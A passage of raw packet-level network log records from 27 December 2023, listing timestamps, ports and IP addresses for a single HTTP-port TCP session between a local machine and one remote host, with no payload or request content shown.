Dec 27, 2023 17:57:26.262065887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262075901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262092113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262111902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262119055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262132883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262135983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262147903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262161970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262172937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262180090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262192965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262197971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262269020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262281895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262295008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262305021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262309074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262325048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262331009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262350082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262362003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262373924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262386084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262403965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262434006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262795925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262813091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262825012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262845039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262851000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262861013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262885094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262913942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262928009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262939930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262950897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262953997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262968063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262973070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262998104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.263060093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263119936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263161898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.263184071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263196945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263209105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263221979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263223886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.263237000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263248920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263257027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.263261080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263273954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263284922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.263288021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263303041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263314962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.263315916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263329983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263338089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.263345003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263365030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.263750076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263824940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263839006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263850927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263859987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.263864040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263880014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263886929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.263892889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263906002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.263922930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263933897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.263937950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263951063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263966084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.263986111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.264012098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.264048100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264061928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264075041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264087915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264098883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.264106989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264121056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264132023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.264136076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264149904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264161110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.264163017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264177084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264189959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.264190912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264204979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264213085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.264219046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264235020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264236927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.264249086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264266968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.264730930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264749050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264761925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264781952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.264792919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.264826059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264839888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264872074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264883995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264889002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.264897108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264909983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264918089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.264925003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264950991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.264951944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264969110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.264991999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.265002966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.265043974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.265168905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.265182972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.265194893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.265208006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.265219927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.265225887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.265233994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.265247107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.265253067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.265261889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.265269995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.265275002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.265290022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.265302896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.265304089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.265324116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.265955925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266010046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266046047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266107082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266120911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266133070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266141891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266145945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266159058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266166925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266175032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266190052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266200066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266232967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266269922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266283989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266295910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266309977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266314030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266323090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266335964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266346931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266350985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266364098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266376972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266388893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266390085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266405106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266407013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266417980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266432047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266433954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266446114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266463041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266465902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266477108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266489029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266490936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266515970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266613960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266627073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266642094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266673088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266691923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266693115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266707897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266721964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266741037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266752958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266756058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266768932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266777039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266782045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266794920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266805887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266808033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266830921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266901970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266916037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266927958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266940117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266952991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266954899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.266968012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266980886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266993999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.266998053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.267009020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267016888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.267023087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267035007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267046928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.267050028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267081976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.267422915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267440081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267462969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.267497063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267509937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267522097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267535925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267553091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.267566919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.267584085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267616034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267631054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267631054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.267652988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267694950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.267827988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267843008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267853975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267863035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.267868042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267882109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267890930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.267896891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267910004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267920017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.267923117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267937899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.267941952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267956018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267967939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267976046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.267981052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.267996073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268004894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.268008947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268023968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268030882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.268038988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268060923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.268487930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268506050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268518925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268532991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268548965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268549919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.268563986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268569946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.268589973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.268595934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268609047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268621922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268635988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268646002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.268649101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268671989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.268688917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.268734932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268748045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268760920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268773079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268786907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.268786907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268801928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268812895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.268815041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268829107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268841982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268847942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.268856049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268881083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.268894911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268896103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.268913984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268925905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.268946886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.269406080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269490957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269505024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269519091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269531965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269531965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.269546032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269558907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.269560099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269572973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.269577026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269592047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269599915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.269607067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269620895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269634008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269634962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.269648075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269660950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.269660950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269681931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.269695997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269709110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269721031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269733906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269737959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.269756079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269768000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.269782066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269794941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.269819975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269831896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269844055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269855976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269869089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.269891024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269896030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.269906044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.269931078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.270252943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270313025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270328999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270343065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270355940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270371914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.270397902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.270437956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270452023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270497084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.270585060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270600080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270612001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.270625114 CET	80	49738	5.42.65.125	192.168.2.4
